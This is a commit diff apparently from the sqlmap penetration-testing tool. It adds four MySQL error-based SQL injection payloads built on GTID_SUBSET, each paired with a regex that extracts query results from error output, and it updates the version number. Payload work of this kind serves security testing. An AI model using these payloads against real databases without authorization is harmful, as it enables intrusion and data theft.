Adding new payload (credits: blackfan.ru)

2024-11-24 10:33:47 +03:00 · 2020-07-10 14:33:45 +02:00 · 2020-07-10 14:33:45 +02:00 · 6b7a1dfd94
commit 6b7a1dfd94
parent 67f918f6ad
3 changed files with 84 additions and 1 deletions
--- a/data/xml/payloads/error_based.xml
+++ b/data/xml/payloads/error_based.xml
@ -91,6 +91,46 @@
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>
        <stype>2</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
        <request>
            <payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.6</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>
        <stype>2</stype>
        <level>4</level>
        <risk>3</risk>
        <clause>1,8,9</clause>
        <where>1</where>
        <vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
        <request>
            <payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.6</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
        <stype>2</stype>
@ -886,6 +926,26 @@
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.6 error-based - Parameter replace (GTID_SUBSET)</title>
        <stype>2</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>3</where>
        <vector>GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
        <request>
            <payload>GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.6</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
        <stype>2</stype>
@ -1155,6 +1215,26 @@
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>
        <stype>2</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
        <request>
            <payload>,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.6</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
        <stype>2</stype>
--- a/doc/CHANGELOG.md
+++ b/doc/CHANGELOG.md
@ -6,14 +6,17 @@
 # Version 1.3 (2019-01-05)
 * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
 * [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
 # Version 1.2 (2018-01-08)
 * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
 * [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
 # Version 1.1 (2017-04-07)
 * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
 * [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
 # Version 1.0 (2016-02-27)
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -18,7 +18,7 @@ from lib.core.enums import OS
 from thirdparty.six import unichr as _unichr
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.4.7.4"
+VERSION = "1.4.7.5"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)